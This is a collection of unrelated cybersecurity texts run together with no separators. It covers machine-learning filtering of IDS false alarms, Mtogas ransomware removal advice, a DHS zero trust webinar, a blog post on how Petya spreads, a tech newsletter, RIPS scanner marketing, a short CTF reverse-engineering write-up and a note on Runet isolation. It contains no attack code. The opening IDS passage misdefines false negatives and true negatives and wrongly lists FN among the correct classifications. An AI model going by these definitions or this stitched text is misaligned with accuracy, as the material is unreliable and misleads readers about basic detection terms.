Machine Learning False Alarm Rate Reduction; In some cases, IDS / IPS Systems may classify an event correctly or falsely. Classified events are evaluated in four categories in literature. - True Positives (TP): intrusive and anomalous, - False Negatives (FN): Not intrusive and not anomalous, - False Positives (FP): not intrusive but anomalous, - True Negatives (TN): Intrusive but not anomalous. TP and FN represent correctly classified events, FP and TN represent wrongly classified events. Recognizing TN (intrusive but not anomalous) is a very hard task and can not be detected by the system itself, human factor must be involved to the mechanism for recognizing this type of events. FP (not intrusive but anomalous) is an event classified as intrusive but it is actually a normal user’s event. This is a very common occurrence in today’s systems. False alarm rate reduction is a one of the challenging problem for especially IDS / IPS system which has been used for commercial purpose. In generally, for the purpose of reducing false alarm rate, an extra module (also known as the filter) must be implemented before IDS / IPS’ output. In this way, false alarms are eliminated from outputs and network administrator should only handle a small amount of alarm which can be really an intrusion attempt. Thus, time and manpower are saved. In this chapter, it is explained that how filter module works, and how it reduces false alarms. Machine Learning, False Alarm Rate Reduction The majority of researchers have provided a solution to alarm correlation for anomaly techniques since purely anomaly techniques trigger more alarms than other techniques. Although hybrid approach optimizes the visibility and performance of the system, it makes the alarm correlation more complicated. There is a need to attract researchers’ attention to providing solutions for alarm management for recently used hybrid detection methods. There are two main assumptions for Anomaly Based IDSs, first of these intrusion events represent anomaly behavior and the second one is that user profile does not change much in a short amount of time. False alarms occur when the edges of these assumptions are not defined well. Basically, outputs of the IDS/IPS are consist of two classes of events. First is the attack events which are classified correctly and the other one is normal events which are classified falsely as an attack. Actually, both attack events and normal events consist of many classes. Since, we want to separate them into real alarm classes and false alarm classes, we think that there are two classes in this output data. Now, we have the output data, and we do not know which one is real alarm and which one is not. In machine learning terminology this means that data have no labels. Because of this, we can use unsupervised techniques (also known clustering techniques) to create two clusters according to our purpose. There are so many algorithms developed for clustering. In general, clustering algorithms use distance metrics to evaluate the similarity between samples. Every sample is clustered with similar samples. So every cluster has samples which are similar to each other. With this idea, after the algorithm works, we have two classes for alarm data. One of these represents normal events, the other one represents attack events. Based on two main assumptions which are explained above, we can infer small cluster as representing attack events. The approach which we have explained during the chapter is one of the basic level approaches, so it is explained because of good understanding about the methodology. There are a lot of different, complex and successful approaches developed in the literature. In recent studies, researchers have used the combination more than one technique instead of a single algorithm for reducing false alarm rate. For example, for two layered clustering, first layer clusters suspicious events and non-suspicious events, and second layer gives the final decision for clusters. Like this, there are so many hybrid approaches developed in the literature.
The activity of the threat actors behind the STOP Ransomware project is not dying down, and they continue to release countless of new variants that are being spread via various means. The purpose of the Mtogas Ransomware, one of the recent STOP Ransomware variants, is to encrypt the majority of the victim’s files, and then extort them by offering to supply them with a data decryption solution. The removal of the Mtogas Ransomware is a simple task, but doing it once the ransomware has done its job will not change much – the damage done to the file system will persist even if the source of the issue is removed. Unfortunately, the only way to undo the damage done by the Mtogas Ransomware is to run a decryption tool and configure it to use the unique decryption key that was generated during the attack. Unfortunately, that key piece of information is stored on the server of the attackers, and they are only willing to exchange it for money. The Mtogas Ransomware’s Authors Want a Hefty Payment for a Decryptor The Mtogas Ransomware marks the files of the victim by adding the ‘.mtogas’ extension to their name – files that were not encrypted will not be affected by this modification. Furthermore, victims of the Mtogas Ransomware also will notice the file ‘_readme.txt,’ which also is the product of the ransomware attack – it contains instructions on how to contact the perpetrators ([email protected] and [email protected]) and an offer to purchase a decryptor. The con artists want to be paid in Bitcoin, so they also offer instructions on how to exchange money for Bitcoin. We advise you to stay away from the attackers’ offer since paying them is not a good idea – you may get tricked, and you will not be able to take your money back. Instead, you should use an anti-virus tool to eliminate the harmful application, and then look into data recovery options that do not involve co-operating with cybercriminals.
Date: On demand Duration: 1 hour Cost: No Fee The Homeland Security Department is taking steps to address the ever-changing cybersecurity threats and challenges through a zero trust architecture. But it’s not one approach to ZTA, rather each component is taking a slightly different path to reach the same goal across the entire agency. DHS is in a distinctive position when it comes to cybersecurity. It is both the chef and the diner. Because of the Cybersecurity and Infrastructure Security Agency, DHS provides guidance, technical support and coordination across the government. And the components must implement what CISA and others ask of them and they are, maybe, held to a higher standard given the fact they sit within DHS. The continuous diagnostics and mitigation (CDM) program is a perfect example of this. While CISA put similar agencies into groups, DHS was its own group, meaning it was charged with implementing CDM tools and capabilities ahead of most agencies. In fact, agencies and CISA are close to completing the baselines for asset management and identity and access management, which are foundational pieces of a zero trust architecture, for all civilian agencies. The CDM effort is but one example of how agencies have been moving toward this zero trust concept for some time. And to be clear, zero trust is not a technology or a tool, but a concept and framework that helps agencies and really all organizations protect systems and data. It moves the protections to the edge with the device and the user instead of the perimeter of a data center. Shane Barney, the chief information security officer for the U.S. Citizenship and Immigration Services within DHS, said his agency started the move to zero trust more than five years ago, about the same time it started to move the cloud. That has led to USCIS leaning on identity and access management capabilities to manage its role based access for about 97% of all applications. “We had a lot of these foundational pieces in place, and it became very evident that the zero trust model and architecture was really what we need to have, especially when given the cloud technologies and especially on the development front and the areas we are moving into. We started with some sort of base level assumptions. We went in with the idea that everything is dynamic in our environment, especially in cloud, and we’re going to the idea here is to permit the least amount of privileges possible, but still be able to accomplish the task or job at hand, and watch and verify everything, those were sort of our baselines,” Barney said during the discussion Strategies for a Zero Trust Architecture sponsored by Splunk. “Now, of course, we set up an official zero trust work group. But really, we want to take more of an agile approach to it from a security perspective, which means we start small, we fail early and fail often because that’s part of the process. But we fail forward and we do it again, repeat, learn, repeat, and rinse and do it again. We started out with tiny projects on which we’d be employing the zero trust principles.” Barney said agencies need to think about what zero trust means. He said it’s actually about asset trust. John Samios, the chief systems security officer for the Transportation Security Administration in DHS, said his agency is working across the five pillars of CISA’s zero trust maturity model—identity, devices, network, application and data. “What we’re trying to do initially is get corporate buy-in. We’ve started an integrated product team (IPT) across all of TSA to make sure everybody really understands the scope of what we’re trying to do and what are the goals we’re trying to achieve. Then we can set milestones and set metrics that we can actually say, ‘we have successfully got this bar, let’s go to the next gate,’” Samios said. “I think we’re making some good progress in into doing that into developing that, and then from that, we come up with our plan and try to come up with timeframes of when we can reach these things.” The IPT includes the CXO community as well as program managers, business owners and system owner, Samios said. Craig Wilson, the director of identity credential and access management at the Federal Emergency Management Agency in DHS, said his agency is moving its identity and access management system to the cloud as part of its cyber and IT modernization effort. The FEMA enterprise cloud authentication bridging services (FECABS) is a software-as-a-service implementation that should be ready by the end of fiscal 2024. “We already know what the state of play for radius migration is. We have systems that we’ve already done some minor modifications to and systems that have challenges,” he said. “We’re going to focus on those systems that are ready upfront, and then by that time, the others should be ready to go and bring them in there.” Bill Wright, the senior director of North American government affairs at Splunk, said as each agencies advances down the zero trust path, they should keep in mind the real tenet of all cybersecurity is trust so they need to have the ability to identify all of their assets and then assess their trustworthiness across that ecosystem. “In a zero trust environment, there’s a real need to have that granular, continuous visibility into every component, including real time risk scores and the infrastructure. Then, more importantly, the context to evaluate the trustworthiness of every device, user and ensure every network flow is authenticated and authorized,” he said. “The policies need to be dynamic and calculated from as many sources of data as possible. Those are the real challenges, I think, in pulling together all of these tools is getting the most out of that data that’s coming in.” This program is sponsored by How to access the content: Please scroll down and re-enter the requested form fields in order for the webinar to appear at the top of the page. Please register using the form on this page or call (202) 895-5023. Chief Information Security Officer, U.S. Citizenship and Immigration Services Chief Systems Security Officer, Transportation Security Administration Director, Identity Credential and Access Management, Federal Emergency Management Agency Senior Director, North American Government Affairs, Splunk By providing your contact information to us, you agree: (i) to receive promotional and/or news alerts via email from Federal News Network and our third party partners, (ii) that we may share your information with our third party partners who provide products and services that may be of interest to you and (iii) that you are not located within the European Economic Area.
I’ve been blogging on WannaCry recently, my last post was all about the question, “Why was this allowed to happen?” As I stated then, Microsoft did indeed release a Bulletin MS17-010 and patch for the SMBv1 vulnerability that ultimately was exploited by the WannaCry attack in March. Presumably, every concerned system administrator patched all their servers. But there’s a new twist in the delivery system. The new Petya ransomware uses the same vulnerability as WannaCry to infect systems, but uses a new vector – PSExec – to move from one system where they gain administrative rights to others. Example: Even if a server is patched, if the System Administrator’s laptop becomes infected with Petya ransomware, it can use those admin credentials to jump around in a network to the servers. How? Petya ransomware finds passwords by extracting passwords from memory or the local filesystem on the infected laptop, and uses them to move to other systems. Administrator rights allow the upload of the malicious files by helping them masquerade as legitimate file uploads. A similar “alternative” attack vector was documented in use by NotPetya using the Windows Management Instrumentation (WMI) tool to spread. So there’s two possible methods for attack vector to examine as you defend your ecosystem. The MSRT tool can help Windows users remove the software, with all the latest updates; this, of course, is dependent on the tool already being loaded and kept updated on the system. For those users who are in lock down due to full encryption, it is less useful. It’s not enough to just patch the servers, controlled directly by the system administrators on a (hopefully) centralized patching system. The latest vectors of Petya and NotPetya are clear indicators that endpoints are going to matter just as much. If a PC or application stores a username and password in plain text anywhere in the system or logs, there exists the possibility for malware to find it. Again, as previously, I encourage everyone to test their code and applications for Abuse of Functionality vulnerabilities and sanitized inputs, so that even a trusted user (like the admin) will not be able to upload infected files behind the scenes. Additionally, make sure that all applications secure their user and password lists in encrypted files. It’s not just your websites that are a danger – it is an issue with internal applications as well. ERP systems, payroll systems, anything with an application interface can be vulnerable to an infected administrator’s laptop and enable the spread. Patch early, and test all your applications to protect against Petya ransomware. The post To #Petya or #NotPetya – It’s an Important Question appeared first on WhiteHat Security. *** This is a Security Bloggers Network syndicated blog from Blog – WhiteHat Security authored by Ryan O'Leary. Read the original post at: http://feedproxy.google.com/~r/WhitehatSecurityBlog/~3/JDftSlyu4rg/
Discover more from hrbrmstr's Daily Drop Warpgate; Submillimeter-scale multimaterial terrestrial robots; Terraforming Mars (FOSS) A less code-heavy edition today to give y'all a break from Perhaps the most ubiquitous cybersecurity problem in any organization (outside of not patching installed software) the lack of something called "network segmentation". MITRE ATT&CK (a globally accessible knowledge base of defender resources, including adversary tactics and techniques based on real-world observations) defines it this way (where the above link goes): Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems. "DMZ" is "demilitarized zone" (a sizable chunk of cyber folk like to think they're soldiers fighting wars for some daft reason); VPCs are just logically isolated virtual networks. In "flat" (i.e. non-segmented), internal networks, every compute resource is available in user-space, including administrative interfaces. In organization cloud computing environments, non-segmented networks mean that services like databases and middleware APIs (along with administrative interfaces) are all laid bare on the hostile internet. Organizations tend to have these flat networks and/or fully public cloud networks because it's "easier". It absolutely is easier for attacks — like ransomware campaigns — to succeed in these types of environments. When networks are segmented, or isolated from each other, one does need a way to get to them to get work done. There are multiple ways to enable this access, with a popular one being the use of a bastion host — another (sigh) military term usurped by digital warriors, which is nothing more than a server whose purpose is to provide access to a private network from an external network. Warpgate is a Rust-based SSH and HTTPS bastion host that runs on Linux. For SSH use, Warpgate receives SSH connections with specifically formatted credentials, authenticates the user locally, connects to the target itself, and then connects both parties together while (optionally) recording the session. This is somewhat different from traditional SSH bastion hosts known as "jump hosts", where you SSH to the bastion, then SSH to the target system from said bastion. When connecting through HTTPS, Warpgate presents a selection of available targets, and will then proxy all traffic in a session to the selected target. You can switch between targets at any time. It has a simple (deliberate use of that word vs my usual "straightforward") setup process, a single binary, and supports multifactor authentication. The documentation is great, which means I can leave you in the capable hands of the developers, vs make you read even more walls of text here. Submillimeter-scale multimaterial terrestrial robots This section title is also the title of a paper by a group of Northwestern University researchers. Here's the abstract: Robots with submillimeter dimensions are of interest for applications that range from tools for minimally invasive surgical procedures in clinical medicine to vehicles for manipulating cells/tissues in biology research. The limited classes of structures and materials that can be used in such robots, however, create challenges in achieving desired performance parameters and modes of operation. Here, we introduce approaches in manufacturing and actuation that address these constraints to enable untethered, terrestrial robots with complex, three-dimensional (3D) geometries and heterogeneous material construction. The manufacturing procedure exploits controlled mechanical buckling to create 3D multimaterial structures in layouts that range from arrays of filaments and origami constructs to biomimetic configurations and others. A balance of forces associated with a one-way shape memory alloy and the elastic resilience of an encapsulating shell provides the basis for reversible deformations of these structures. Modes of locomotion and manipulation span from bending, twisting, and expansion upon global heating to linear/curvilinear crawling, walking, turning, and jumping upon laser-induced local thermal actuation. Photonic structures such as retroreflectors and colorimetric sensing materials support simple forms of wireless monitoring and localization. These collective advances in materials, manufacturing, actuation, and sensing add to a growing body of capabilities in this emerging field of technology. Northwestern University engineers have developed the smallest-ever remote-controlled walking robot — and it comes in the form of a tiny, adorable peekytoe crab. Just a half-millimeter wide, the tiny crabs can bend, twist, crawl, walk, turn and even jump. The researchers also developed millimeter-sized robots resembling inchworms, crickets and beetles. Although the research is exploratory at this point, the researchers believe their technology might bring the field closer to realizing micro-sized robots that can perform practical tasks inside tightly confined spaces. Smaller than a flea, the crab is not powered by complex hardware, hydraulics or electricity. Instead, its power lies within the elastic resilience of its body. To construct the robot, the researchers used a shape-memory alloy material that transforms to its "remembered" shape when heated. In this case, the researchers used a scanned laser beam to rapidly heat the robot at different targeted locations across its body. A thin coating of glass elastically returns that corresponding part of structure to its deformed shape upon cooling. It's super neat, and (IMO) super creepy tech that will be the stuff of nightmares for many days/weeks/years to come (how long before these are used to kill people or invade privacy?). Northwestern also has a video that I'll leave you with to explore further. Terraforming Mars (FOSS) FryxGames’ Teraforming Mars (TM) is a great board game. This is how they introduce it: The taming of the Red Planet has begun! Corporations are competing to transform Mars into a habitable planet by spending vast resources, and using innovative technology to raise temperature, create a breathable atmosphere, and make oceans of water. As terraforming progresses, more and more people will immigrate from Earth to live on the Red Planet. In Terraforming Mars, you control a corporation with a certain profile. Play project cards, build up production, place your cities and green areas on the map, and race for milestones and awards! Will your corporation lead the way into humanity’s new era? TM has replaced Catan as the default "family game" at home, and there are official, digital versions of it that you can play in solo mode or online with others. If you're already familiar with TM or want to explore the game for the first time, you can also do so for free! A group of developers have built a FOSS (GPLv3) version that you can run on your own (it's pretty straightforward) or play right now on their Heroku instance. Go forth and make Mars great again! Does anyone have the over/under on the final UK government resignations count? That's got to be some good action, unless Sky News is right. (In other news, Haas sure was right back in 2017 about the declining global order. It's a great book if you need some beach/cottage/camping reading.) ☮
Security researchers, code analysts, and security consultants analyze third-party source code, which can be already running in production environments, for security threats. Their goal is to quickly discover security vulnerabilities, determine if and how these are exploitable, and what kind of risk they pose to the infrastructure. RIPS significantly speeds up the workflow of security professionals by automating the precise vulnerability identification process and by minimizing the risk of overlooking dangerous code in large code bases. The interactive vulnerability dashboard allows to quickly evaluate findings and to summarize detected issues for the final analysis report. Developers of PHP applications extend existing frameworks and write new source code from scratch. Their goal is to find a reasonable tradeoff between building and shipping new applications fast, and implementing the right security mechanisms in order to protect their sensitive data, servers, and reputation. Hence, vulnerability detection must be very fast, and the process of understanding and fixing issues must be even faster. RIPS is the fastest static code analysis tool available. Detected issues can be reviewed in real-time and a scan finishes within minutes. Detailed instructions allow to easily prioritize and understand all findings, so that the most critical issues can be patched first. Our API allows to seamlessly integrate an automated security analysis into the development lifecycle. Web hoster, network operators, and administrators face the big challenge of running multiple web applications, partly with an unknown origin of the source code. At the same time, reliable protection of the infrastructure must be maintained and the attack surface kept small. A security analysis for thousands of installations must run fast, requires a powerful automation process, and produce a high level overview of the security state for all installations. With the help of a powerful API, our fast and precise security analysis can be fully automated, scheduled, and integrated into the risk management. Operators can be alarmed when vulnerable code was added and actions for websites with a critical security status can be taken.
# VolgaCTF 2020 Qualifier : F-Hash **category** : reverse **points** : 250 **solves** : 43 Run the executable. It takes a long time and fails to find the answer. Then I start to reverse the binary. Function 12A0 takes two parameter `a, b` and return `bitcount(a) + bitcount(b)` Function 13B0 is a recursion function and it is the main cause of the performance. There is a while loop that continues to execute `-=`. It is actually performing mod operations. Rewrite the whole function using python and do the following two things. 1. Don't use recursion, cache the answer. 2. Turn the subtraction into modulus operation Finally, replace the right value in gdb and continue running. The output will be the flag. # other write-ups and resources
Roskomnadzor has published a draft of the order that describes the rules for isolating the Runet “in the event of threats”.In this case, the centralized management regime will begin to operate, which will be implemented by the Department.Traffic will be banned from sending outside Russia. The Russian segment of the Internet can go offline when the following threats occur: — threat to integrity — when it is impossible to establish a connection between users; — the threat of stability — disruption of the network in case of failure of equipment, natural and man-made disasters; — a threat to the safety of operation — attempts to hack equipment providers or exert a destabilizing external or internal information impact on the network. As we can see, the description of threats does not affect the cryptocurrency market, but at the same time, the table of contents is rather blurry, which means that no project is immune from the isolation of the Internet.